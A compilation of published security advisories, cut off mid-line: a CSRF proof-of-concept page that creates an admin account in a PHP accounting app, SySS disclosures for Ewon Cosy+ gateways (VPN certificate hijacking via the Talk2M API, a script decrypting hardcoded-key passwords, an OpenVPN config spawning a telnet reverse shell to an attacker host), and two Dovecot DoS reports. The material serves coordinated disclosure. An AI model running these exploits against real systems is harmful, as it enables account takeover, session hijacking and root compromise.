<pre><code>=============================================================================================================================================<br />| # Title : Accounting Journal Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /> <br />[+] Line 6 : Set your target url<br /><br />[+] Line 15 + 19 : Set user & pass<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http://127.0.0.1/ajms/classes/Users.php?f=save", true);<br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "Hacked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-043<br />Product: Ewon Cosy+ / Talk2M Remote Access Solution<br />Manufacturer: HMS Industrial Networks AB<br />Affected Version(s): N.A.<br />Tested Version(s): N.A.<br />Vulnerability Type: Improper Authentication (CWE-287)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-17<br />Solution Date: 2024-04-18<br />Public Disclosure: 2024-08-11<br />CVE Reference: CVE-2024-33897<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Ewon Cosy+ is a VPN gateway used for remote access and maintenance<br />in industrial environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The Ewon Cosy+ gateway establishes a secure VPN connection between<br />the machine (PLC, HMI, or other devices) and the remote engineer.<br />The connection happens through Talk2m, a highly secured industrial<br />cloud service. The Ewon Cosy+ makes industrial remote access easy<br />and secure like never before!"<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />During account assignment in the Talk2M platform, a Cosy+ device<br />generates and sends a certificate signing request (CSR) to the back end.<br />This CSR is then signed by the manufacturer and used for OpenVPN<br />authentication by the device afterward.<br /><br />Since the common name (CN) of the certificate is specified by the device<br />and used in order to assign the OpenVPN session to the corresponding<br />Talk2M account, an attacker with root access to a Cosy+ device is able<br />to manipulate the CSR and get correctly signed certificates for foreign<br />devices.<br /><br />Using these certificates for OpenVPN authentication results in hijacking<br />the VPN session and allows for further attacks, e.g.:<br /><br />- - Impacting the accessibility of the original device<br />- - Attacking the Talk2M-connected user device via the VPN connection<br />- - Eavesdropping and manipulating the network communication of connected<br /> users<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />Note: Since the X.509 client certificate of a Cosy+, which is used for<br /> authentication against the Talk2M API, is handled by the hardware<br /> security module (HSM), root access to a Cosy+ device is required.<br /><br /><br />1. Exporting the OpenSSL engine to use the hardware security module:<br /> <br /> $ export OPENSSL_CONF=/etc/ssl/se050_openssl.cnf<br /> $ export EX_SSS_BOOT_SSS_PORT=/dev/i2c-0<br /><br /><br />2. Sending a self-created CSR to the Talk2M API:<br /> <br /> $ curl --path-as-is -i -s -k -X $'POST' \<br /> -H $'Host: eu.device.talk2m.com' -H $'Accept: application/json' \<br /> -H $'Content-Type: application/json' -H $'Ewon-Serial: 2403-0999-25' \<br /> -H $'Device-State: AccountLinked' -H $'Content-Length: 768' \<br /> --data-binary $'{\x0a\x09\"csr\":<br /> \x09\"-----BEGIN CERTIFICATE REQUEST-----\\nMIIB6zCCAUwCAQAwgaY<br /> xCzAJBgNVBAYTAkJFMRcwFQYDVQQIEw5CcmFiYW50IFdh\\nbGxvbjERMA8GA1U<br /> EBxMITml2ZWxsZXMxIzAhBgNVBAoTGkhNUyBJbmR1c3RyaWFs\\nIE5ldHdvcmt<br /> zIFNBMRAwDgYDVQQLEwdFd29uIEJVMRYwFAYDVQQDEw1EMjMwNy0w\\nMTAxLTI<br /> 1MRwwGgYJKoZIhvcNAQkBFg1pbmZvQGV3b24uYml6MIGbMBAGByqGSM49\\nAgE<br /> GBSuBBAAjA4GGAAQBaUGPo1FIjOOqyd1M47M2fcLQ2MN3aj7wI8pBYmopdSEY\\<br /> nKszktBPre3AZ74E4326+vUej6nBG/17SWNb+VZPEyXYBAvEyyvsXfy/UlnB6NX<br /> aj\\n6rrmy2pqP5bKN/1yR3reqlA6+9rdYzcH3ESJvp9hTkZnV4qbdNjTtqSfZO<br /> 4zu1Zn\\nE+CgADAKBggqhkjOPQQDAgOBjAAwgYgCQgDVbJN5MJJZnkRRvNwwXu<br /> 6GrvILBN6H\\nxTwR3inwMxLf+a/o+SFiqq5Pvsm2UXebVSD3osopdnJ8cxzTzi<br /> PopsLiXAJCAa5K\\n+0T0H8VAvBzKTQkpiHHzW9JkDvIDaJA4WtYzA+KT7jo4kW<br /> vQIr7rBBOlILoofQzv\\nypCqHaugjHhdeuJecIiq\\n-----END CERTIFICAT<br /> E REQUEST-----\\n\"\x0a}' \<br /> $'https://eu.device.talk2m.com/certificates/csr' \<br /> --cert /tmp/birth_key_crt.pem --key /tmp/birth_key_ref.pem<br /><br /><br />3. Requesting the signed certificate:<br /> <br /> $ curl -i -k -H $'Device-State: AccountLinked' \<br /> https://device.talk2m.com/certificates/deviceCertificate \<br /> --cert birth_key_crt.pem --key birth_key_ref.pem<br /><br /><br />4. Talk2M response:<br /> <br /> HTTP/1.1 200<br /> date: Tue, 16 Apr 2024 13:09:57 GMT<br /> server: Apache<br /> ewon-server-time: 1713272998<br /> device-state: VpnProvisioned<br /> content-type: application/json<br /> transfer-encoding: chunked<br /> <br /> {"certificate":"-----BEGIN CERTIFICATE-----\nMIIDTjCCAjagAwIBA[...]<br /> KsxyR8w==\n-----END CERTIFICATE-----"}<br /><br /><br />5. This signed certificate and the used key can be used for OpenVPN<br /> authentication. The CN will be used to assign the session to the<br /> corresponding Talk2M account. This also overwrites a potential<br /> current VPN session of the original device:<br /><br /> $ openvpn --config attacker.ovpn<br /> Attempting to establish TCP connection with [AF_INET]51.195.79.69:443<br /> TCP connection established with [AF_INET]51.195.79.69:443<br /> TCPv4_CLIENT link remote: [AF_INET]51.195.79.69:443<br /> VERIFY OK: depth=1, C=BE, ST=Brabant Wallon, L=Nivelles, O=eWON sa,<br /> OU=Talk2M, CN=Talk2M Certification Authority,<br /> emailAddress=itmanager@talk2m.com<br /> VERIFY KU OK<br /> Validating certificate extended key usage<br /> ++ Certificate has EKU (str) TLS Web Server Authentication,<br /> expects TLS Web Server Authentication<br /> VERIFY EKU OK<br /> VERIFY OK: depth=0, C=BE, ST=Brabant Wallon, L=Nivelles,<br /> O=HMS Industrial Networks SA, OU=Talk2M, CN=server-device,<br /> emailAddress=info@ewon.biz<br /> Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384,<br /> peer certificate: 2048 bit RSA, signature: RSA-SHA1<br /> [server-device] Peer Connection Initiated with [AF_INET]51.195.79.69:443<br /> TUN/TAP device tap0 opened<br /> net_addr_ll_set: lladdr 00:03:27:d8:68:84 for tap0<br /> TUN/TAP link layer address set to 00:03:27:d8:68:84<br /> net_iface_mtu_set: mtu 1500 for tap0<br /> net_iface_up: set tap0 up<br /> net_addr_v4_add: 10.37.211.214/16 dev tap0<br /> Data Channel: cipher 'AES-256-GCM', peer-id: 0, compression: 'lzo'<br /> Timers: ping 10, ping-exit 40<br /> Initialization Sequence Completed<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The vulnerability was fixed in the back end by HMS on April 18, 2024.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-09: Potential vulnerability discovered<br />2024-04-16: Call with the manufacturer and requested a Talk2M account<br /> with an assigned device to verify the potential vulnerability<br />2024-04-16: Manufacturer provided a Talk2M account with an assigned device<br />2024-04-16: Vulnerability confirmed<br />2024-04-16: Short update about the state sent to the manufacturer<br />2024-04-16: Security advisory inculding technical details provided to<br /> the manufacturer<br />2024-04-18: Vulnerability fixed by the manufacturer<br />2024-04-30: CVE ID CVE-2024-33897[5] assigned by the manufacturer<br />2024-07-12: Manufacturer asked for reviewing the blog post draft<br />2024-07-12: Confirmed reviewing the blog post is possible and asking for<br /> the sending of details<br />2024-07-17: Blog post provided to HMS<br />2024-07-23: Inquiry about the status<br />2024-07-23: Manufacturer reviewed the blog post<br />2024-07-24: Manufacturer also asked for an appointment to discuss the blog post<br />2024-07-29: Discussion with HMS about the blog post and final publication<br /> actions<br />2024-08-11: Vulnerability disclosed at DEF CON[7]<br />2024-08-11: Blog post published[6]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Ewon Cosy+ product website<br /> https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet<br />[2] SySS Security Advisory SYSS-2024-043<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-043.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Manufacturer note<br /> https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf<br />[5] CVE-2024-33897<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33897<br />[6] Blog post<br /> https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/<br />[7] DEF CON talk<br /> https://defcon.org/html/defcon-32/dc-32-speakers.html#54521<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay47wACgkQrgyb+PE0<br />i1O5RQ/9HM9YIPRLVqGSRNPYW45F9e1wj9uHTvt78XjRng5lbRPpgWAO1G6UVQvS<br />ebugxzjAtGrdMxx8X1NHd9vbshyAHj/q33Y0fkQ5TB2hnSMkn2nbXTEZKIIS6wK0<br />XnJhB31iVnkgMeNFQ0SwSutBnnxJ7mvQ6vUBG210DSHjpQtu8rWuCyrf3BcSCJ/I<br />nT79b7TJOxOMD1y5VAeVP6Pehh+IlJgvSItXZyOjs4wgt/+z+wVoKnYdqSAHpovI<br />/rjVbtp7cvIhQInghnDoRWfXce34bk07geOB4VGg7bhxGCeWbJZq/Dxrag5jJb9l<br />0zx2K4M8ZTwFcrtAliFgyzrIgvjfOk9HCZasSMl20znj4+3QaAWpfn2oMmCQCaLg<br />6hBqAQ+s66Cv8Br24WKdlnj3nrsn+SAX2TKDxajt+WiDkXKvsLPs8XCmzVN8jViK<br />nN/dJ3chba4yhqmpft1wRXG71VvBdbv3pkLp7usKszUrul8M802JzF2aGTUsiKgQ<br />QSxpNhSP4aC2jqjt1OpX7W6NKD1nIhg0VrduxlwlAcQ2uffbh8xtak1MgZry0/yP<br />6j9a15DOTJshMeud8R3Bkfjms/0Jzm43uyjIeRGNP79UyohsTX4jOJAsUYr0efUZ<br />/55N3HiCD94jYoee5E3sF1vWlrhVDzkWJ7Q8u/W4osSIwMNikTc=<br />=JS3w<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>Affected product: Dovecot IMAP Server<br />Internal reference: DOV-6601<br />Vulnerability type: CWE-770 (Allocation of Resources Without Limits or Throttling)<br />Vulnerable version: 2.2, 2.3<br />Vulnerable component: lib-mail<br />Report confidence: Confirmed<br />Solution status: Fixed in 2.3.21.1<br />Researcher credits: Vendor internal discovery<br />Vendor notification: 2024-01-31<br />CVE reference: CVE-2024-23185<br />CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)<br /><br />Vulnerability Details:<br />Very large headers can cause resource exhaustion when parsing message. The message-parser normally reads reasonably sized chunks of the message. However, when it feeds them to message-header-parser, it starts building up "full_value" buffer out of the smaller chunks. The full_value buffer has no size limit, so large headers can cause large memory usage. It doesn't matter whether it's a single long header line, or a single header split into multiple lines. This bug exists in all Dovecot versions.<br /><br />Incoming mails typically have some size limits set by MTA, so even largest possible header size may still fit into Dovecot's vsz_limit. So attackers probably can't DoS a victim user this way. A user could APPEND larger mails though, allowing them to DoS themselves (although maybe cause some memory issues for the backend in general).<br /><br />Workaround:<br />One can implement restrictions on headers on MTA component preceding Dovecot.<br /><br />Fix:<br />Install non-vulnerable version of Dovecot. Patch can be found at https://github.com/dovecot/core/compare/f020e13%5E...ce88c33.patch<br /><br /></code></pre>
<pre><code>Affected product: Dovecot IMAP Server<br />Internal reference: DOV-6464<br />Vulnerability type: CWE-770 (Allocation of Resources Without Limits or Throttling)<br />Vulnerable version: 2.2, 2.3<br />Vulnerable component: lib-mail<br />Report confidence: Confirmed<br />Solution status: Fixed in 2.3.21.1<br />Researcher credits: Vendor internal discovery<br />Vendor notification: 2024-01-30<br />CVE reference: CVE-2024-23184<br />CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N)<br /><br />Vulnerability Details:<br />Having a large number of address headers (From, To, Cc, Bcc, etc.) becomes excessively CPU intensive. With 100k header lines CPU usage is already 12 seconds, and in a production environment we observed 500k header lines taking 18 minutes to parse. Since this can be triggered by external actors sending emails to a victim, this is a security issue.<br /><br />The main problem is that each header line's address is added to the end of a linked list. This is done by walking the whole linked list, which becomes more inefficient the more addresses there are.<br /><br />Workaround:<br />One can implement restrictions on address headers on MTA component preceding Dovecot.<br /><br />Fix:<br />Install non-vulnerable version of Dovecot. Patch can be found at https://github.com/dovecot/core/compare/8e4c42d%5E...1481c04.patch<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-032<br />Product: Ewon Cosy+<br />Manufacturer: HMS Industrial Networks AB<br />Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3<br />Tested Version(s): Firmware Version: 21.2s7<br />Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)<br />Risk Level: Medium<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-10<br />Solution Date: 2024-07-18<br />Public Disclosure: 2024-08-11<br />CVE Reference: CVE-2024-33895<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Ewon Cosy+ is a VPN gateway used for remote access and maintenance<br />in industrial environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The Ewon Cosy+ gateway establishes a secure VPN connection between<br />the machine (PLC, HMI, or other devices) and the remote engineer.<br />The connection happens through Talk2m, a highly secured industrial<br />cloud service. The Ewon Cosy+ makes industrial remote access easy<br />and secure like never before!"<br /><br />Due to the use of a hardcoded cryptographic key, an attacker is able to<br />decrypt encrypted data and retrieve sensitive information.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The Ewon Cosy+ stores sensitive data such as passwords in an encrypted<br />format.<br />These values are included, e.g., in configuration backups.<br /><br />However, a symmetric encryption algorithm (AES-CBC-256) with hardcoded<br />and static cryptographic keys is used.<br />Thus, an attacker is able to decrypt that data and retrieve sensitive<br />information.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />By analyzing the ELF executable "ewon" of an Ewon Cosy+ in a disassembler<br />and decompiler, e.g. Ghidra, the encryption mechanism could be reversed<br />and the hardcoded cryptographic key could be extracted.<br /><br />Used encryption algorithm: AES in CBC mode with a key length of 256 bit<br /><br />A simple Python script was developed to decrypt encrypted values:<br /><br />********************<br />import base64<br />import sys<br />from Crypto.Cipher import AES<br />from binascii import unhexlify<br /><br /><br />def pad(text):<br /> padding_length = AES.block_size - (len(text) % AES.block_size)<br /> padded_text = text + bytes([padding_length] * padding_length)<br /> return padded_text, padding_length<br /><br /><br />encoded_text = sys.argv[1]<br /><br />key_hex = "6367b0 [...]" # redacted<br />iv_hex = "28c9 [...]" # redacted<br /><br />key = unhexlify(key_hex)<br />iv = unhexlify(iv_hex)<br /><br />decoded_text = base64.b64decode(encoded_text[4:])<br />padded_text, padding_length = pad(decoded_text)<br />cipher = AES.new(key, AES.MODE_CBC, iv)<br />decrypted_text = cipher.decrypt(padded_text)<br /><br />print("Plaintext: {}".format(<br /> decrypted_text[1:][:-padding_length-2].decode('utf-8')<br /> ))<br />****************<br /><br />$> python3 decrypt_ewon_pwd.py "#_5_YARU3GSgNcElltjyMMqWfZwb"<br />Plaintext: adm:123<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />According to the manufacturer note[4], the vulnerability was fixed<br />with the firmware versions 21.2s10 and 22.1s3.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-04: Vulnerability discovered<br />2024-04-10: Vulnerability reported to manufacturer<br />2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for<br /> a publication date for all findings<br />2024-04-12: Proposed dates for a discussion about publication<br />2024-04-19: Manufacturer sent a technical overview of planned remediation<br /> actions and details about the planned timeline<br />2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer<br />2024-05-31: Manufacturer informed that the fix is in completion stage and<br /> asked if the blog post[6] can be reviewed by HMS<br />2024-06-04: Proposed dates to review the blog post draft<br />2024-06-21: Inquiry about the status<br />2024-06-21: Received an out-of-office auto reply<br />2024-07-01: Inquiry about the status<br />2024-07-04: Inquiry about the status<br />2024-07-12: Inquiry about the status and letting the manufacturer know that<br /> the vulnerability will be published within a talk at DEF CON[7]<br /> in August<br />2024-07-12: Manufacturer responded that the fix is planned by the end of<br /> July; manufacturer asked again for reviewing the blog post<br /> draft<br />2024-07-12: Again confirmed reviewing the blog post is possible and asking<br /> for the sending of details<br />2024-07-17: Blog post provided to HMS<br />2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS<br />2024-07-23: Inquiry about the status<br />2024-07-23: Manufacturer reviewed the blog post and confirmed that a<br /> fix is provided<br />2024-07-29: Discussion with HMS about the blog post and final publication<br /> actions<br />2024-08-11: Vulnerability disclosed at DEF CON[7]<br />2024-08-11: Blog post published[6]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Ewon Cosy+ product website<br /> https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet<br />[2] SySS Security Advisory SYSS-2024-032<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-032.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Manufacturer note<br /> https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf<br />[5] CVE-2024-33895<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33895<br />[6] Blog post<br /> https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/<br />[7] DEF CON talk<br /> https://defcon.org/html/defcon-32/dc-32-speakers.html#54521<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay420ACgkQrgyb+PE0<br />i1NNyw/9GzNMWrKeghrwqgcJ01f8QJGo1L3ObWscyiMXxqne6Zo8VyIefvGY97hb<br />fZisL4BrzmK+NioLeP3SzM879yGbzU5dca7g5Cqf0qJh9mdU/s6tkgdK+Duz3QdZ<br />9XPV+ovSDGSDk953fVhHrKUdsns9hMnRIoMkfPxZUm+KWXRIwRguNxl2/q1xxgjt<br />2kqTldwgwgekKXXp+Uwt5Z8LUG0dU7pHHb3OCizJ81tOCHjwuJA3aUmyBachl4Vc<br />Nw7GwByxoKLTTEfj2CWtkfC4u9UXHUQJBDl51+qRPIVkG2g0jTSQ2AEIubtmi7IA<br />jA/8PK5QONh0GHptj2LzeTqlcEX7834uIE0gHrR5pkFJvgUWoNueEZ9FIHRNZPLX<br />9Lhu52uiKogX5BVYeRIkbHAxmgf/wojQ4AXE9BMvOgm0HSzjgIaVZ+cqNkMP1ey0<br />uDXPllHkWtA1IBeffhiVrfc11fLJJczkpN3hRevoa4D6hlNvOYrVUAY869vrJkA2<br />LHvFwLf1JDQaGiPCkglCcipjtXw+hqGE+zEYOWobXH4cIwdnPUG+VaAks9GcNEdN<br />o6QVfnLTveo8e1u11z8ftguYthMbhOJxVWPBWJv6XhiCXEw8Gh/HonR6LfGQyRTe<br />Fk+qtF1Mih2ZNKnW+XmHHCjtXGgiarfjExVFnhXHbrE8sOHv90I=<br />=/d8q<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-018<br />Product: Ewon Cosy+<br />Manufacturer: HMS Industrial Networks AB<br />Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3<br />Tested Version(s): Firmware Version: 21.2s7<br />Vulnerability Type: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)<br />Risk Level: Medium<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-03-27<br />Solution Date: 2024-07-18<br />Public Disclosure: 2024-08-11<br />CVE Reference: CVE-2024-33896<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Ewon Cosy+ is a VPN gateway used for remote access and maintenance<br />in industrial environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The Ewon Cosy+ gateway establishes a secure VPN connection between<br />the machine (PLC, HMI, or other devices) and the remote engineer.<br />The connection happens through Talk2m, a highly secured industrial<br />cloud service. The Ewon Cosy+ makes industrial remote access easy<br />and secure like never before!"<br /><br />Due to improper neutralization of parameters read from a user-controlled<br />configuration file, an authenticated attacker is able to inject and execute<br />OS commands on the device.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />Authenticated attackers are able to upload a custom OpenVPN configuration.<br />This configuration can contain the OpenVPN paramaters "--up" and "--down",<br />which execute a specified script or executable.<br /><br />Since the process itself runs with the highest privileges (root),<br />this allows the device to be completely compromised.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />1. Generate a malicious OpenVPN configuration, e.g. instructing the device<br /> to create a reverse shell:<br /><br /> client<br /> dev tun<br /> persist-tun<br /> proto tcp<br /> verb 5<br /> mute 20<br /> --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet <attacker-ip> 5000 0<$TF | sh 1>$TF"'<br /> script-security 2<br /> [...]<br /><br />2. Start a listener on the attacker system:<br /> #> nc -lvp 5000<br /><br />3. Upload the OpenVPN configuration via FTP to Cosy+.<br /><br />4. Set the configuration paramater "VPNCfgFile" to "/usr/<vpnfile>".<br /><br />5. Command is executed by Cosy+ and a reverse shell is initiated:<br /><br /> nc -lvp 5000<br /> istening on 0.0.0.0 5000<br /> Connection received on 192.168.10.240 56806<br /> id<br /> uid=0(root) gid=0(root)<br /><br /><br />Note:<br /> The paramaters "--up" and "--down" need to be specified with<br /> two dashes since the values "up" and "down" are blocklisted on the<br /> device.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />According to the manufacturer note[4], the vulnerability was fixed<br />with the firmware versions 21.2s10 and 22.1s3.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-03-26: Vulnerability discovered<br />2024-03-27: Vulnerability reported to manufacturer<br />2024-04-02: Inquiry about the status<br />2024-04-05: Manufacturer acknowlegded the vulnerability and started the<br /> analysis<br />2024-04-10: Two more vulnerabilities reported to the manufacturer<br /> (SYSS-2024-032 and SYSS-2024-033)<br />2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for<br /> a publication date for all findings<br />2024-04-12: Proposed dates for a discussion about publication<br />2024-04-15: Manufacturer sent a technical overview of planned remediation<br /> actions and details about the planned timeline<br />2024-04-15: Acknowlegded the remediation actions and asked the manufacturer<br /> for assigning a CVE ID<br />2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer<br />2024-05-31: Manufacturer informed that the fix is in completion stage and<br /> asked if the blog post[6] can be reviewed by HMS<br />2024-06-04: Proposed dates to review the blog post draft<br />2024-06-21: Inquiry about the status<br />2024-06-21: Received an out-of-office auto reply<br />2024-07-01: Inquiry about the status<br />2024-07-04: Inquiry about the status<br />2024-07-12: Inquiry about the status and letting the manufacturer know that<br 